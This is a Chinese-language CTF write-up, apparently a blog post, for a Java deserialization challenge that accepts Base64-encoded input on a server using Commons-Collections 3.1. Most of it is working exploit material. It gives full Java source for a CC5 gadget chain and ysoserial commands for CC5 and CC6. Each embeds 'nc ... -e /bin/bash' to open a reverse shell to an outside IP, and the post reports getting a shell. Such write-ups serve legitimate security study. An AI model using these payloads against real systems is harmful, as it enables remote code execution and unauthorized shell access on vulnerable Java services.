很长时间没有发文章了
需要一点java的cc链基础
不懂的可以看看我的这两篇文章
http://blog.m1kael.cn/index.php/archives/449/
http://blog.m1kael.cn/index.php/archives/492/
http://blog.m1kael.cn/index.php/archives/565/
题目有源码
这里给了入口点
简单的java反序列化,只是通过了base解码,意思是我们的pyaload需要base64编码过后的才行
发现依赖是Common-Collections3.1
并且没有waf,cc5和cc6都能打
cc5:
package com.bugku.ez_unserialize.controller;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
public class Cc5 {
public static void main(String[] args) throws ClassNotFoundException, IllegalAccessException, NoSuchFieldException, IOException {
ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
new ConstantTransformer(java.lang.Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"nc 121.41.59.127 8080 -e /bin/bash"})});
HashMap mmap = new HashMap();
LazyMap tiemap = (LazyMap) LazyMap.decorate(mmap, chain);
TiedMapEntry mapEntry = new TiedMapEntry(tiemap, 1);
BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(poc, mapEntry);
ByteArrayOutputStream output = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(output);
outputStream.writeObject(poc);
outputStream.close();
byte[] bytes = output.toByteArray();
String a = Base64.getEncoder().encodeToString(bytes);
System.out.println(a);
}
}
或者直接工具
java -jar ysoserial.jar CommonsCollections5 "nc 121.41.59.127 8080 -e /bin/bash" |base64
或者
java -jar ysoserial.jar CommonsCollections6 "nc 121.41.59.127 8080 -e /bin/bash" |base64
然后就是反弹shell,本地监听,我bp抓包不能成功,只有hackbar成功了
成功反弹了一个没有交互式的shell